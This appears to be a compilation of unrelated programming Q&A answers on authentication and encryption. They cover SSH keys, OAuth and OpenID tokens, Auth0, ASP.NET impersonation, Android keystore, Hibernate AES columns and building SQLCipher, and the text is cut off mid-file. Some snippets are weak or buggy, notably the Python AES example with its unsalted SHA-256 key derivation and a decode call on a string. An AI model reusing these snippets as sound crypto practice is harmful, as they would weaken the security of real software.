Now I have another machine with a new hard drive, so I need to setup git again. I thought I could just add the global config: git config --global user.name '<myname>' git config --global user.email '<myemail>' But it doesn't work. That's right. It would be a shame if somebody else could just run those commands and gain access to your account! Those settings are actually irrelevant to Git authentication. They just determine how commits are recorded. So it seems like I need to go through the steps mentioned in the above link all over again. That's what I'd recommend: Generate a keypair for your new machine and add it to your Bitbucket account. (Technically you could avoid creating a new keypair if you copy your existing keypair from your old machine onto your new one, but that's trickier than it sounds. OpenSSH is very picky about file permissions. I always create new keypairs per machine.) Finally, you could access your repositories via HTTPS instead of SSH. That way you'd have to enter your Bitbucket user name and password to gain access. Though if you've enabled two-factor authentication that gets trickier…
The Deleted Record record isn't supported in SuiteTalk as of version 2016_2 which means you can't run a Saved Search and pull down the results. This is not uncommon when integrating with NetSuite. :( What I've always done in these situations is create a RESTlet (NetSuite's wannabe RESTful API framework) SuiteScript that will run the search (or do whatever is possible with SuiteScript and not possible with SuiteTalk) and return the results. From the documentation: You can deploy server-side scripts that interact with NetSuite data following RESTful principles. RESTlets extend the SuiteScript API to allow custom integrations with NetSuite. Some benefits of using RESTlets include the ability to: Find opportunities to enhance usability and performance, by implementing a RESTful integration that is more lightweight and flexible than SOAP-based web services. Support stateless communication between client and server. Control client and server implementation. Use built-in authentication based on token or user credentials in the HTTP header. Develop mobile clients on platforms such as iPhone and Android. Integrate external Web-based applications such as Gmail or Google Apps. Create backends for Suitelet-based user interfaces. RESTlets offer ease of adoption for developers familiar with SuiteScript and support more behaviors than NetSuite's SOAP-based web services, which are limited to those defined as SuiteTalk operations. RESTlets are also more secure than Suitelets, which are made available to users without login. For a more detailed comparison, see RESTlets vs. Other NetSuite Integration Options. In your case this would be a near trivial script to create, it would gather the results and return JSON encoded (easiest) or whatever format you need. You will likely spend more time getting the Token Based Authentication (TBA) working than you will writing the script. [Update] Adding some code samples related to what I mentioned in the comments below: Note that the SuiteTalk proxy object model is frustrating in that it lacks inheritance that it could make such good use of. So you end with code like your SafeTypeCastName(). Reflection is one of the best tools in my toolbox when it comes to working with SuiteTalk proxies. For example, all *RecordRef types have common fields/props so reflection saves you type checking all over the place to work with the object you suspect you have. public static TType GetProperty<TType>(object record, string propertyID) { PropertyInfo pi = record.GetType().GetProperty(propertyID); return (TType)pi.GetValue(record, null); } public static string GetInternalID(Record record) { return GetProperty<string>(record, "internalId"); } public static string GetInternalID(BaseRef recordRef) { PropertyInfo pi = recordRef.GetType().GetProperty("internalId"); return (string)pi.GetValue(recordRef, null); } public static CustomFieldRef[] GetCustomFieldList(Record record) { return GetProperty<CustomFieldRef[]>(record, CustomFieldPropertyName); }
I have been looking at the exact same issue for the last few days and I think I can at least give you some pointers. Getting everything 'just so' has taken some time and the documentation from NXP (assuming you have access) is a little difficult to interpret in some cases. So, as you probably know, you need to calculate the CMAC (and update your init vec) on transmit as well as receive. You need to save the CMAC each time you calculate it as the init vec for the next crypto operation (whether CMAC or encryption etc). When calculating the CMAC for your example the data to feed into your CMAC algorithm is the INS byte (0x64) and the command data (0x00). Of course this will be padded etc as specified by CMAC. Note, however, that you do not calculate the CMAC across the entire APDU wrapping (i.e. 90 64 00 00 01 00 00) just the INS byte and data payload is used. On receive you need to take the data (0x00) and the second status byte (also 0x00) and calculate the CMAC over that. It's not important in this example but order is important here. You use the response body (excluding the CMAC) then SW2. Note that only half of the CMAC is actually sent - CMAC should yield 16 bytes and the card is sending the first 8 bytes. There were a few other things that held me up including: I was calculating the session key incorrectly - it is worth double checking this if things are not coming out as you'd expect I interpreted the documentation to say that the entire APDU structure is used to calculate the CMAC (hard to read them any other way tbh) I am still working on calculating the response from a Write Data command correctly. The command succeeds but I can't validate the CMAC. I do know that Write Data is not padded with CMAC padding but just zeros - not yet sure what else I've missed. Finally, here is a real example from communicating with a card from my logs: Authentication is complete (AES) and the session key is determined to be F92E48F9A6C34722A90EA29CFA0C3D12; init vec is zeros I'm going to send the Get Key Version command (as in your example) so I calculate CMAC over 6400 and get 1200551CA7E2F49514A1324B7E3428F1 (which is now my init vec for the next calculation) Send 90640000010000 to the card and receive 00C929939C467434A8 (status is 9100). Calculate CMAC over 00 00 and get C929939C467434A8A29AB2C40B977B83 (and update init vec for next calculation) The first half of our CMAC from step #4 matches the 8 byte received from the card in step #3
To refactor your code, you should register a service and take the authentication code to the service. Authenticate service: app.factory('authenticateService', ['$q', 'MeHelper', function($q,MeHelper){ var obj = {}; obj.check_authentication = function(params) { var deferred = $q.defer(); MeHelper.ready() .then(function (me) { if (me.isAuthenticated()) { deferred.resolve(); } else { deferred.reject(); $state.go('login'); } }); return deferred.promise; } return obj; } ]); Then, use this service in any route file in resolve, taking this service name in dependency injection or the function parameter, Route configuration file: (function(){ 'use strict'; var app = angular.module('app'); app.config(/* @ngInject */ function($stateProvider, $urlRouterProvider) { $stateProvider .state('index', { url: "", views: { "FullContentView": { templateUrl: "start.html" } } }) .state('dashboard', { url: "/dashboard", views: { "FullContentView": { templateUrl: "dashboard/dashboard.html" } }, resolve: { authenticated: function(authenticateService) { return authenticateService.check_authentication(); } } }) $urlRouterProvider.otherwise('/404'); }); })(); watch the below lines, this is what we changes in the route configuration to resolve. the service is injected in below lines: resolve: { authenticated: function(authenticateService) { return authenticateService.check_authentication(); } }
The id_token that you receive as the outcome of user authentication follows the OpenID Connect specification so it will include an exp claim that you can check in order to detect expiration. exp: Expiration time on or after which the ID Token MUST NOT be accepted for processing. The processing of this parameter requires that the current date/time MUST be before the expiration date/time listed in the value. Implementers MAY provide for some small leeway, usually no more than a few minutes, to account for clock skew. Its value is a JSON number representing the number of seconds from 1970-01-01T0:0:0Z as measured in UTC until the date/time. (emphasis is mine; source: OpenID Connect) If the offline_access scope is included when performing the authentication process you should get a refresh token issued alongside the ID token. According to react-native-lock documentation you can then use the authenticationAPI() method to get an Authentication API client that can be used to refresh user's token. The specific call can be seen in the react-native-auth0 documentation: .authentication('{YOUR_CLIENT_ID}') .refreshToken('user refresh_token') .then(response => console.log(response)) .catch(error => console.log(error));
It's little late but i think this will be very helpful. No one mention about use scheme like PKCS#7 padding. You can use it instead the previous functions to pad(when do encryption) and unpad(when do decryption).i will provide the full Source Code below. import base64 import hashlib from Crypto import Random from Crypto.Cipher import AES import pkcs7 class Encryption: def __init__(self): pass def Encrypt(self, PlainText, SecurePassword): pw_encode = SecurePassword.encode('utf-8') text_encode = PlainText.encode('utf-8') key = hashlib.sha256(pw_encode).digest() iv = Random.new().read(AES.block_size) cipher = AES.new(key, AES.MODE_CBC, iv) pad_text = pkcs7.encode(text_encode) msg = iv + cipher.encrypt(pad_text) EncodeMsg = base64.b64encode(msg) return EncodeMsg def Decrypt(self, Encrypted, SecurePassword): decodbase64 = base64.b64decode(Encrypted.decode("utf-8")) pw_encode = SecurePassword.decode('utf-8') iv = decodbase64[:AES.block_size] key = hashlib.sha256(pw_encode).digest() cipher = AES.new(key, AES.MODE_CBC, iv) msg = cipher.decrypt(decodbase64[AES.block_size:]) pad_text = pkcs7.decode(msg) decryptedString = pad_text.decode('utf-8') return decryptedString import StringIO import binascii def decode(text, k=16): nl = len(text) val = int(binascii.hexlify(text[-1]), 16) if val > k: raise ValueError('Input is not padded or padding is corrupt') l = nl - val return text[:l] def encode(text, k=16): l = len(text) output = StringIO.StringIO() val = k - (l % k) for _ in xrange(val): output.write('%02x' % val) return text + binascii.unhexlify(output.getvalue())
It depends on how you want to acquire the token. There are lots of scenario to integrate the application with Azure AD. You can refer it from here. For example, if you want to use the Azure AD Graph in a daemon or service application, we can use the Client Credential flow. 1 . First we need to register an web application on the portal( detail steps refer here) and grant the permission to read the directory data like figure below: 2 . And then we can get the clientId, secret, tenantId from the portal and use the code below to acquire token(need to install the Active Directory Authentication Library) string authority = "https://login.microsoftonline.com/{tenantId}"; string clientId = ""; string secret = ""; string resrouce = "https://graph.windows.net"; var credential = new ClientCredential(clientId, secret); AuthenticationContext authContext = new AuthenticationContext(authority); var token = authContext.AcquireTokenAsync(resrouce, credential).Result.AccessToken; Console.WriteLine(token); 3 . Then we can use this token to call the Azure AD Graph REST directly or we can use the graph client library for Azure AD to retrieve the users. Here is the code samples for your reference: //use the Azure AD client library string accessToken = ""; string tenantId = ""; string graphResourceId = "https://graph.windows.net"; Uri servicePointUri = new Uri(graphResourceId); Uri serviceRoot = new Uri(servicePointUri, tenantId); ActiveDirectoryClient client = new ActiveDirectoryClient(serviceRoot, async () => await Task.FromResult(accessToken)); foreach(var user in client.Users.ExecuteAsync().Result.CurrentPage) Console.WriteLine(user.DisplayName); //using the HTTP request var client = new HttpClient(); var tenantId = ""; var uri = $"https://graph.windows.net/{tenantId}/users?api-version=1.6"; var token = ""; client.DefaultRequestHeaders.Authorization = new System.Net.Http.Headers.AuthenticationHeaderValue("bearer", token); var response = client.GetAsync(uri).Result; var result = response.Content.ReadAsStringAsync().Result; Console.WriteLine(result); Update The secrecy is available for the web application/web API when you create an application. Then you can generate the key by keys section like figure below. After you save the app, you can copy the secrect now.
The Key ID and Key is obtained from the Apple Developer account portal. The process is described in the Xcode help and can be found by searching the help for “Configure push notifications.”. You create a new Push Notification Authentication key in the Developer portal: Go to Certificates, Identifiers & Profiles, and under Certificates, select All or APNs Auth Key. Click the Add button (+) in the upper-right corner. Under Production, select the “Apple Push Notification Authentication Key (Sandbox & Production)” checkbox, and click Continue. Once you click Continue, you will see the following screen: The Key ID is the KID referred to in the documentation and when you click Download you will get the private key that is associated with this key ID. You can use this to generate the token, which is a JSON document with the following format: { "alg": "ES256", "kid": "ABC123DEFG" } { "iss": "DEF123GHIJ", "iat": 1437179036 } where kid is the Key ID and iss the team identifier, also from the Developer portal. iat is the issued at time for this token, which is the number of seconds since Epoch, in UTC After you create the token, you must sign it with the private key that was downloaded from the portal when the kid was generated. You must then encrypt the token using the Elliptic Curve Digital Signature Algorithm (ECDSA) with the P-256 curve and the SHA-256 hash algorithm. To ensure security, APNs requires new tokens to be generated periodically. A new token has an updated issued at claim key, whose value indicates the time the token was generated. If the timestamp for token issue is not within the last hour, APNs rejects subsequent push messages, returning an ExpiredProviderToken (403) error.
Try changing your $event = Event::find($id) to $event = Event::findOrFail($id) As far I remember, it'll throw a ModelNotFoundException if it couldn't find anything for that id. Go to app/Exceptions/Handler.php and inside the render method, catch the exception and handle it. Edited: if ($e instanceof HttpResponseException) { return $e->getResponse(); } elseif ($e instanceof ModelNotFoundException) { $e = new NotFoundHttpException($e->getMessage(), $e); } elseif ($e instanceof AuthenticationException) { return $this->unauthenticated($request, $e); } elseif ($e instanceof AuthorizationException) { $e = new HttpException(403, $e->getMessage()); } elseif ($e instanceof ValidationException && $e->getResponse()) { return $e->getResponse(); } You can see that the parent render method fires a NotFoundHttpException if it gets a ModelNotFoundException exception. I guess you can overwrite it to match your requirement.
Unfortunately he wants me to use some other framework, or even a core PHP implementation with PDO You, as a developer, have the ability to tell your client why he might be wrong about this. If the website/application is built with SilverStripe then he should have a very good/specific reason not to continue to use it to implement an API over the top of the SilverStripe data - it makes perfect sense to use SilverStripe for this, and little sense to rewrite parts of the SilverStripe framework for the sake of "not using SilverStripe." It's also important to mention to your client that the underlying encryption/hashing algorithms that SilverStripe implements are not part of its public API, and hence can change without requiring explicit notice given to developers. This could mean that the default algorithm could be changed (for example if a zero-day exploit is found in the blowfish algorithm) and your mobile app would then stop working. Using a SilverStripe API would not have this same problem. The above also applies to the general data structure of SilverStripe. Let's assume that one day they decide to move away from flat tables into an EAV database storage design - their public API (classes with public methods) will stay the same while their backend classes that separate the accessibility from the processing and data storage will change. You will have to update your API too, if you build it yourself! How does SilverStripe encrypt its passwords? It depends - the default method is encryption with the blowfish algorithm, but there are a half dozen or so (in 3.4.1) implementations of the PasswordEncryptor class that could be configured for use. The algorithm to use is configurable via the Security::$password_encryption_algorithm property, or via YAML config. Each user could have a different password encryption/hashing algorithm used - take a look at the Member database table under the PasswordEncryption column. How do I manually authenticate users using plain PHP Theoretically if you wanted to do this, you'd need to recreate most of the logic in the framework's authenticator. Start by looking at Member::checkPassword - this is the initiation of the logic to check the password against the member - which is what you'll care about. You'll find yourself assuming that most implementations of SilverStripe will use the default algorithm of blowfish encryption, and follow PasswordEncryptor::create_for_algorithm through to PasswordEncryptor_Blowfish::check. At this point you'll see that you literally will end up replicating an amount of the SilverStripe framework's code to be able to achieve what you want. Summary What you want to achieve will involve a lot of duplication It will not work for 100% of SilverStripe implementations It may work now, but will break at some point when the algorithms change Ask your client why, and convince them to change their mind about it (after all, you're the expert, they're the client) Use a SilverStripe API module (a couple listed below) API modules silverstripe/silverstripe-restfulserver - Officially supported, and provides a simple and easy way to get started with providing API access to your SilverStripe system. You have basic control over the HTTP request methods, and can limit access and permissions by each DataObject. colymba/silverstripe-restfulapi - Community module. Arguably more flexible and powerful. Slightly more work to set up/configure the way you want it to work.
For the Auth0 scenario you can accomplish this by leveraging the rules functionality to customize the authentication pipeline of the user. Rules allow you to easily customize and extend Auth0's capabilities. Rules can be chained together for modular coding and can be turned on and off individually. More specifically, you can use a redirect based rule to ensure that the user provides the necessary additional information in the cases where the original method of authentication is unable or lacks said information. Rules can also be used to programmatically redirect users before an authentication transaction is complete, allowing the implementation of custom authentication flows which require input on behalf of the user, such as: Requiring users to provide additional verification when logging in from unknown locations. Implementing custom verification mechanisms (e.g. proprietary multifactor authentication providers). Forcing users to change passwords. (emphasis is mine) Your concrete scenario would be very similar to the first point mentioned, you would detect a specific situation, in your case, the user does not have birthday and city information available, and conditionally redirect the user to a form that would collect this information which would then upon submission resume the authentication process. Depending on the amount of data in question and/or specific data storage requirements you might have you could either store the collected data as part of the Auth0 user profile in what's referred to as user metadata or use your own store. Auth0 allows you to store metadata, or data related to each user that has not come from the identity provider. There are two kinds of metadata: user_metadata: stores user attributes (such as user preferences) that do not impact a user's core functionality; app_metadata: stores information (such as a user's support plan, security roles, or access control groups) that can impact a user's core functionality, such as how an application functions or what the user can access. For guidance on what are the use cases for the Auth0 metadata storage also check User Data Storage Guidance.
I solved it with the following code. In AccountController: [Authorize(Roles="Administrators")] public async Task<IActionResult> ImpersonateUser(string id) { var appUser = await _userManager.FindByIdAsync(id); var userPrincipal = await _signInManager.CreateUserPrincipalAsync(appUser); userPrincipal.Identities.First().AddClaim(new Claim("OriginalUserId", User.FindFirst(x=>x.Type == ClaimTypes.NameIdentifier).Value)); await _signInManager.SignOutAsync(); //sign out the current user //https://github.com/aspnet/Identity/blob/dev/src/Microsoft.AspNetCore.Identity/IdentityCookieOptions.cs await HttpContext.Authentication.SignInAsync("Identity.Application", userPrincipal); //impersonate the new user return RedirectToAction("Index", "Home"); } public async Task<IActionResult> StopImpersonation() { var originalUserId = User.Claims.First(x => x.Type == "OriginalUserId").Value; var appUser = await _userManager.FindByIdAsync(originalUserId); await _signInManager.SignInAsync(appUser, false); return RedirectToAction("Index", "Home"); } Basically this adds the claim OriginalUserId to the impersonated user. By checking if this claim exists I know I'm currently impersonating and can provide a way back to the original account using the code in StopImpersonation. The authentication scheme Identity.Application is the default.
The attachments sent by the user will end up in the Attachments collection of the IMessageActivity. There you will find the URL of the attachment the user sent. Then, you will have to download the attachment and add your logic to upload it to Blob storage or any other storage you would like to use. Here is a C# example showing how to access and download the attachments sent by the user. Added the code below for your reference: public virtual async Task MessageReceivedAsync(IDialogContext context, IAwaitable<IMessageActivity> argument) { var message = await argument; if (message.Attachments != null && message.Attachments.Any()) { var attachment = message.Attachments.First(); using (HttpClient httpClient = new HttpClient()) { // Skype attachment URLs are secured by a JwtToken, so we need to pass the token from our bot. if (message.ChannelId.Equals("skype", StringComparison.InvariantCultureIgnoreCase) && new Uri(attachment.ContentUrl).Host.EndsWith("skype.com")) { var token = await new MicrosoftAppCredentials().GetTokenAsync(); httpClient.DefaultRequestHeaders.Authorization = new AuthenticationHeaderValue("Bearer", token); } var responseMessage = await httpClient.GetAsync(attachment.ContentUrl); var contentLenghtBytes = responseMessage.Content.Headers.ContentLength; await context.PostAsync($"Attachment of {attachment.ContentType} type and size of {contentLenghtBytes} bytes received."); } } else { await context.PostAsync("Hi there! I'm a bot created to show you how I can receive message attachments, but no attachment was sent to me. Please, try again sending a new message including an attachment."); } context.Wait(this.MessageReceivedAsync); }
Raj, By default the token is not stored by the server. Only your client has it and is sending it through the authorization header to the server. If you used the default template provided by Visual Studio, in the Startup ConfigureAuth method the following IAppBuilder extension is called: app.UseOAuthBearerTokens(OAuthOptions). This extension coming from the Microsoft.AspNet.Identity.Owin package makes it easy for you to generate and consume tokens, but it is confusing as it is an all in one. Behind the scene it's using two Owin middlewares: OAuthAuthorizationServerMiddleware: authorize and deliver tokens OAuthBearerAuthenticationMiddleware: occurs at the PipelineStage.Authenticate, read the authorization header, check if the token is valid and authenticate the user. To answer you questions WebAPI is able to validate the token thanks to the OAuthBearerAuthenticationMiddleware, it will ensure that the token sent through the authorization header is valid and not expired. And the token is stored only by your client, if the client loose it, it will have to request a new one. I advise you to get deeper in the OAuth protocol, and instead of using the extension UseOAuthBearerTokens, take a look at UseOAuthAuthorizationServer and UseOAuthBearerAuthentication, it will help you to better understand how it works.
Simplified example of controller using IAuthenticationManager using Microsoft.Owin.Security; using System.Web; //...other usings public class AccountController : Controller { [HttpPost] [ActionName("Login")] public ActionResult Login(LoginViewModel model) { if (ModelState.IsValid) { string userName = (string)Session["UserName"]; string[] userRoles = (string[])Session["UserRoles"]; ClaimsIdentity identity = new ClaimsIdentity(DefaultAuthenticationTypes.ApplicationCookie); identity.AddClaim(new Claim(ClaimTypes.NameIdentifier, userName)); userRoles.ToList().ForEach((role) => identity.AddClaim(new Claim(ClaimTypes.Role, role))); identity.AddClaim(new Claim(ClaimTypes.Name, userName)); AuthenticationManager.SignIn(identity); return RedirectToAction("Success"); } else { return View("Login",model); } } private IAuthenticationManager AuthenticationManager { get { return HttpContext.GetOwinContext().Authentication; } } }
I had same problem, I want key to be configurable. The only solution i found for this item is to update annotation values at runtime. Yes, i know that this sounds awful, but as far as i know there is no other way. Entity class: @Entity @Table(name = "user") public class User implements Serializable { @Column(name = "password") @ColumnTransformer(read = "AES_DECRYPT(password, '${encryption.key}')", write = "AES_ENCRYPT(?, '${encryption.key}')") private String password; } I implemented class that replaces ${encryption.key} to the some other value (in my case loaded from Spring application context) import org.hibernate.annotations.ColumnTransformer; import org.springframework.beans.factory.annotation.Value; import org.springframework.stereotype.Component; import java.lang.annotation.Annotation; import java.lang.reflect.Field; import java.lang.reflect.Proxy; import java.util.Map; import javax.annotation.PostConstruct; @Component(value = "transformerColumnKeyLoader") public class TransformerColumnKeyLoader { public static final String KEY_ANNOTATION_PROPERTY = "${encryption.key}"; @Value(value = "${secret.key}") private String key; @PostConstruct public void postConstruct() { setKey(User.class, "password"); } private void setKey(Class<?> clazz, String columnName) { try { Field field = clazz.getDeclaredField(columnName); ColumnTransformer columnTransformer = field.getDeclaredAnnotation(ColumnTransformer.class); updateAnnotationValue(columnTransformer, "read"); updateAnnotationValue(columnTransformer, "write"); } catch (NoSuchFieldException | SecurityException e) { throw new RuntimeException( String.format("Encryption key cannot be loaded into %s,%s", clazz.getName(), columnName)); } } @SuppressWarnings("unchecked") private void updateAnnotationValue(Annotation annotation, String annotationProperty) { Object handler = Proxy.getInvocationHandler(annotation); Field merberValuesField; try { merberValuesField = handler.getClass().getDeclaredField("memberValues"); } catch (NoSuchFieldException | SecurityException e) { throw new IllegalStateException(e); } merberValuesField.setAccessible(true); Map<String, Object> memberValues; try { memberValues = (Map<String, Object>) merberValuesField.get(handler); } catch (IllegalArgumentException | IllegalAccessException e) { throw new IllegalStateException(e); } Object oldValue = memberValues.get(annotationProperty); if (oldValue == null || oldValue.getClass() != String.class) { throw new IllegalArgumentException(String.format( "Annotation value should be String. Current value is of type: %s", oldValue.getClass().getName())); } String oldValueString = oldValue.toString(); if (!oldValueString.contains(TransformerColumnKeyLoader.KEY_ANNOTATION_PROPERTY)) { throw new IllegalArgumentException( String.format("Annotation value should be contain %s. Current value is : %s", TransformerColumnKeyLoader.KEY_ANNOTATION_PROPERTY, oldValueString)); } String newValueString = oldValueString.replace(TransformerColumnKeyLoader.KEY_ANNOTATION_PROPERTY, key); memberValues.put(annotationProperty, newValueString); } } This code should be run before creating EntityManager. In my case i used depends-on (for xml config or @DependsOn for java config). <bean id="entityManagerFactory" class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean" depends-on="transformerColumnKeyLoader"> ... </bean>
This is not to do with shiny, but whatever server you're storing the data on, how you're using encryption/hashing, and software/app security methods you've used to protect against specific vulnerabilities. Having said that, here's the (rather minimal, IMHO) security statement for shinyapps.io: shinyapps.io is secure-by-design. Each Shiny application runs in its own protected environment and access is always SSL encrypted. Standard and Professional plans offer user authentication, preventing anonymous visitors from being able to access your applications. I would say that the burden will heavily fall on you to use good encryption and data storage practices. There are many official and unofficial guidelines you can look to for guidance on data storage. One which big companies, particularlly companies going public, must follow is Sarbanes-Oxley. From grtcorp.com: The Sarbanes-Oxley Act (SOX Act) was passed by Congress and signed into law in 2002 in response to major cases of financial fraud, of which the rise and collapse of Enron is the best known. The overall focus of the measure is on financial reporting responsibilities, and ensuring that financial audits are genuinely independent. However, SOX also includes provisions that relate to the security and preservation of financial data. And the standards set out for its implementation "recognized that senior management can't just certify controls ON the system, these controls also have to control the way financial information is generated, accessed, collected, stored, processed, transmitted, and used through the system." Senior management is thus held ultimately responsible for financial data security, including putting in place appropriate controls and procedures to ensure this data security. The good news is that powerful tools, including data discovery and Data Masking, are available to meet these standards. I would also encourage you to familiarize yourself with OWASP's list of the top 10 major web app vulnerabilities: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
So to do this I ended up encrypting the users pin in to shared preferences and then decrypting when the fingerprint auth was successful: So to save the pin: private static final String CHARSET_NAME = "UTF-8"; private static final String ANDROID_KEY_STORE = "AndroidKeyStore"; private static final String TRANSFORMATION = KeyProperties.KEY_ALGORITHM_AES + "/" + KeyProperties.BLOCK_MODE_CBC + "/" + KeyProperties.ENCRYPTION_PADDING_PKCS7; private static final int AUTHENTICATION_DURATION_SECONDS = 30; private KeyguardManager keyguardManager; private static final int SAVE_CREDENTIALS_REQUEST_CODE = 1; public void saveUserPin(String pin) throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, UnsupportedEncodingException, BadPaddingException, IllegalBlockSizeException { // encrypt the password try { SecretKey secretKey = createKey(); Cipher cipher = Cipher.getInstance(TRANSFORMATION); cipher.init(Cipher.ENCRYPT_MODE, secretKey); byte[] encryptionIv = cipher.getIV(); byte[] passwordBytes = pin.getBytes(CHARSET_NAME); byte[] encryptedPasswordBytes = cipher.doFinal(passwordBytes); String encryptedPassword = Base64.encodeToString(encryptedPasswordBytes, Base64.DEFAULT); // store the login data in the shared preferences // only the password is encrypted, IV used for the encryption is stored SharedPreferences.Editor editor = BaseActivity.prefs.edit(); editor.putString("password", encryptedPassword); editor.putString("encryptionIv", Base64.encodeToString(encryptionIv, Base64.DEFAULT)); editor.apply(); } catch (UserNotAuthenticatedException e) { e.printStackTrace(); showAuthenticationScreen(SAVE_CREDENTIALS_REQUEST_CODE); } } private SecretKey createKey() { try { KeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, ANDROID_KEY_STORE); keyGenerator.init(new KeyGenParameterSpec.Builder(Constants.KEY_NAME, KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT) .setBlockModes(KeyProperties.BLOCK_MODE_CBC) .setUserAuthenticationRequired(true) .setUserAuthenticationValidityDurationSeconds(AUTHENTICATION_DURATION_SECONDS) .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7) .build()); return keyGenerator.generateKey(); } catch (NoSuchAlgorithmException | NoSuchProviderException | InvalidAlgorithmParameterException e) { throw new RuntimeException("Failed to create a symmetric key", e); } } Then to decrypt: public String getUserPin() throws KeyStoreException, CertificateException, NoSuchAlgorithmException, IOException, NoSuchPaddingException, UnrecoverableKeyException, InvalidAlgorithmParameterException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException { // load login data from shared preferences ( // only the password is encrypted, IV used for the encryption is loaded from shared preferences SharedPreferences sharedPreferences = BaseActivity.prefs; String base64EncryptedPassword = sharedPreferences.getString("password", null); String base64EncryptionIv = sharedPreferences.getString("encryptionIv", null); byte[] encryptionIv = Base64.decode(base64EncryptionIv, Base64.DEFAULT); byte[] encryptedPassword = Base64.decode(base64EncryptedPassword, Base64.DEFAULT); // decrypt the password KeyStore keyStore = KeyStore.getInstance(ANDROID_KEY_STORE); keyStore.load(null); SecretKey secretKey = (SecretKey) keyStore.getKey(Constants.KEY_NAME, null); Cipher cipher = Cipher.getInstance(TRANSFORMATION); cipher.init(Cipher.DECRYPT_MODE, secretKey, new IvParameterSpec(encryptionIv)); byte[] passwordBytes = cipher.doFinal(encryptedPassword); String string = new String(passwordBytes, CHARSET_NAME); return string; } The showAuthenticationScreen method that is called looks like this: private void showAuthenticationScreen(int requestCode) { Intent intent = keyguardManager.createConfirmDeviceCredentialIntent(null, null); if (intent != null) { startActivityForResult(intent, requestCode); } } And then to get the result back from showAuthenticationScreen just override onActivityResult and call saveUserPin or getUserPin again whichever is required.
How to build the Qt-SQL-driver-plugin 'QSQLCIPHER' for SQLite-DB with SQLCipher-extension using the Windows/MinGW-platform: Qt 5.4.0 for Windows/MinGW Download Qt Install including the sources e.g to C:\Qt\Qt5.4.0 OpenSSL for Windows Download Win32 OpenSSL v1.0.2a Download Visual C++ 2008 Redistributable Install Visual C++ 2008 Redistributable by executing 'vcredist_x86.exe' Install OpenSSL v1.0.2a by executing 'Win32OpenSSL-1_0_2.exe' Target directory e.g. C:\OpenSSL-Win32 During installation choose the option to install the libraries to the Windows system directory (C:\Windows\SysWOW64) MinGW - Minimalist GNU for Windows Download and install 'mingw-get-setup.exe' Start of MinGW Installer Installation of MSYS Base System Selection: All Packages -> MSYS -> MSYS Base System Select msys-base (Class 'bin') for installation Menu: installation -> apply changes Installation of files by default to directory C:\MinGW Installation of Tcl/Tk Selection: All Packages -> MinGW -> MinGW Contributed Select 'mingw32-tcl' and 'mingw32-tk' (Class 'bin') for installation Menu: installation -> apply changes Installation of files by default to directory C:\MinGW Copy content of C:\MinGW to the Qt-MinGW-directory C:\Qt\Qt5.4.0\Tools\mingw491_32 Create file 'fstab' in C:\Qt\Qt5.4.0\Tools\mingw491_32\msys\1.0\etc Insert content as follows: #Win32_Path Mount_Point C:/Qt/Qt5.4.0/Tools/mingw491_32 /mingw C:/Qt/Qt5.4.0/5.4 /qt C:/ /c zlib-Library Download zlib-dll-Binaries Extract and copy file 'zlib1.dll' to the Qt-MinGW-directory C:\Qt\Qt5.4.0\Tools\mingw491_32\msys\1.0\bin SQLCipher Download the SQLCipher-zip-file Extract the zip-file e.g. to C:\temp\sqlcipher-master Copy OpenSSL-Win32-libraries Copy C:\OpenSSL-Win32\bin\libeay32.dll to C:\temp\sqlcipher-master Copy C:\OpenSSL-Win32\lib\libeay32.lib to C:\temp\sqlcipher-master Build SQLCipher.exe Execute MSYS: C:\Qt\Qt5.4.0\Tools\mingw491_32\msys\1.0\msys.bat $ cd /c/temp/sqlcipher-master $ ./configure --prefix=$(pwd)/dist --with-crypto-lib=none --disable-tcl CFLAGS="-DSQLITE_HAS_CODEC -DSQLCIPHER_CRYPTO_OPENSSL -I/c/openssl-win32/include /c/temp/sqlcipher-master/libeay32.dll -L/c/temp/sqlcipher-master/ -static-libgcc" LDFLAGS="-leay32" $ make clean $ make sqlite3.c $ make $ make dll $ make install Save the executable SQLite/SQLCipher-database e.g. to C:\sqlcipher Copy C:\temp\sqlcipher-master\dist\bin\sqlcipher.exe to C:\sqlcipher. The file 'sqlcipher.exe' is the crypting equivalent to the non-crypting original command line interface 'sqlite3.exe'. Copy C:\temp\sqlcipher-master\sqlite3.dll to C:\sqlcipher. This file is the SQLite-library extended by the encryption. The SQLite-database with SQLCipher-extension is now ready for work. Build Qt-QSQLCIPHER-driver-plugin Create directory: C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\plugins\sqldrivers\sqlcipher Create the following three files within the new directory: File 1: smain.cpp: #include <qsqldriverplugin.h> #include <qstringlist.h> #include "../../../../src/sql/drivers/sqlite/qsql_sqlite_p.h" // There was a missing " at the end of this line QT_BEGIN_NAMESPACE class QSQLcipherDriverPlugin : public QSqlDriverPlugin { Q_OBJECT Q_PLUGIN_METADATA(IID "org.qt-project.Qt.QSqlDriverFactoryInterface" FILE "sqlcipher.json") public: QSQLcipherDriverPlugin(); QSqlDriver* create(const QString &); }; QSQLcipherDriverPlugin::QSQLcipherDriverPlugin() : QSqlDriverPlugin() { } QSqlDriver* QSQLcipherDriverPlugin::create(const QString &name) { if (name == QLatin1String("QSQLCIPHER")) { QSQLiteDriver* driver = new QSQLiteDriver(); return driver; } return 0; } QT_END_NAMESPACE #include "smain.moc" File 2: sqlcipher.pro TARGET = qsqlcipher SOURCES = smain.cpp OTHER_FILES += sqlcipher.json include(../../../sql/drivers/sqlcipher/qsql_sqlite.pri) wince*: DEFINES += HAVE_LOCALTIME_S=0 PLUGIN_CLASS_NAME = QSQLcipherDriverPlugin include(../qsqldriverbase.pri) File 3: sqlcipher.json { "Keys": [ "QSQLCIPHER" ] } Copy directory C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\sql\drivers\sqlite to C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\sql\drivers\sqlcipher Customize file C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\sql\drivers\sqlcipher\qsql_sqlite.pri The content of the file shall be like: HEADERS += $$PWD/qsql_sqlite_p.h SOURCES += $$PWD/qsql_sqlite.cpp !system-sqlite:!contains(LIBS, .*sqlite3.*) { 